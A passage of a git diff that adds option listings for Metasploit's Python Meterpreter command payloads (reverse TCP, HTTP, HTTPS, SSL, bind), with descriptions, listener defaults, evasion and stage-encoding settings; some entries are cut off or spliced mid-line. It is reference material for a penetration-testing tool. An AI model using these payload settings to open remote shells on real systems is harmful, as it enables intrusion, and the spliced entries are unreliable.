shell. + + Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). + + Listen for a connection with UUID Support + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork true no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_http.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_http.txt new file mode 100644 index 0000000..ab6e3ac --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_http.txt @@ -0,0 +1,74 @@ + + Name: Python Exec, Python Meterpreter, Python Reverse HTTP Stager + Module: payload/cmd/unix/python/meterpreter/reverse_http + Platform: Unix + Arch: cmd +Needs Admin: No + +Evasion options for payload/cmd/unix/python/meterpreter/reverse_http: +========================= + +ent Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). + + Tunnel communication over HTTP + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork true no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_https.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_https.txt new file mode 100644 index 0000000..9fb0833 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_https.txt @@ -0,0 +1,76 @@ + + Name: Python Exec, Python Meterpreter, Python Reverse HTTPS Stager + Module: payload/cmd/unix/python/meterpreter/reverse_https + Platform: Unix + Arch: cmd +Needs Admin: No + +Evasion options for payload/cmd/unix/python/meterpreter/reverse_https: +========================= + +nt Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). + + Tunnel communication over HTTP using SSL + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork true no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..52f12b9 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_tcp.txt @@ -0,0 +1,67 @@ + + Name: Python Exec, Python Meterpreter, Python Reverse TCP Stager + Module: payload/cmd/unix/python/meterpreter/reverse_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 514 + Rank: Normal + +Provided by: + Spencer McIntyre + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork true no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_tcp_ssl.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_tcp_ssl.txt new file mode 100644 index 0000000..df56c4a --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_tcp_ssl.txt @@ -0,0 +1,70 @@ + + Name: Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager + Module: payload/cmd/unix/python/meterpreter/reverse_tcp_ssl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 510 + Rank: Normal + +Provided by: + Spencer McIntyre + Ben Campbell + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). + + Reverse Python connect back stager using SSL + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork true no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_tcp_uuid.txt new file mode 100644 index 0000000..dc624f1 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter-reverse_tcp_uuid.txt @@ -0,0 +1,68 @@ + + Name: Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support + Module: payload/cmd/unix/python/meterpreter/reverse_tcp_uuid + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 582 + Rank: Normal + +Provided by: + Spencer McIntyre + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). + + Connect back to the attacker with UUID Support + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork true no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter_bind_tcp.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter_bind_tcp.txt new file mode 100644 index 0000000..c888fec --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter_bind_tcp.txt @@ -0,0 +1,54 @@ + + Name: Python Exec, Python Meterpreter Shell, Bind TCP Inline + Module: payload/cmd/unix/python/meterpreter_bind_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 24965 + Rank: Normal + +Provided by: + Spencer McIntyre + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Connect to the victim and spawn a Meterpreter shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpReferer no An optional value to use for the Referer HTTP header + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork true no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter_reverse_http.txt new file mode 100644 index 0000000..2aed131 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter_reverse_http.txt @@ -0,0 +1,69 @@ + + Name: Python Exec, Python Meterpreter Shell, Reverse HTTP Inline + Module: payload/cmd/unix/python/meterpreter_reverse_http + Platform: Unix + Arch: cmd +Needs Admin: No + T +Evasion options for payload/cmd/unix/python/meterpreter_reverse_http: +========================= + +rent Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Connect back to the attacker and spawn a Meterpreter shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork true no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-python-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-unix-python-meterpreter_reverse_https.txt new file mode 100644 index 0000000..937bfb8 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-python-meterpreter_reverse_https.txt @@ -0,0 +1,71 @@ + + Name: Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline + Module: payload/cmd/unix/python/meterpreter_reverse_https + Platform: Unix + Arch: cmd +Needs Admin: No + T +Evasion options for payload/cmd/unix/python/meterpreter_reverse_https: +========================= + +ent Setting Required Description +---- --------------- -------- ----------- +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + +Description: + Execute a Python payload as an OS command from a Posix-compatible shell. + + Connect back to the attacker and spawn a Meterpreter shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MeterpreterDebugBuild false no Enable debugging for the Python meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork true no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for 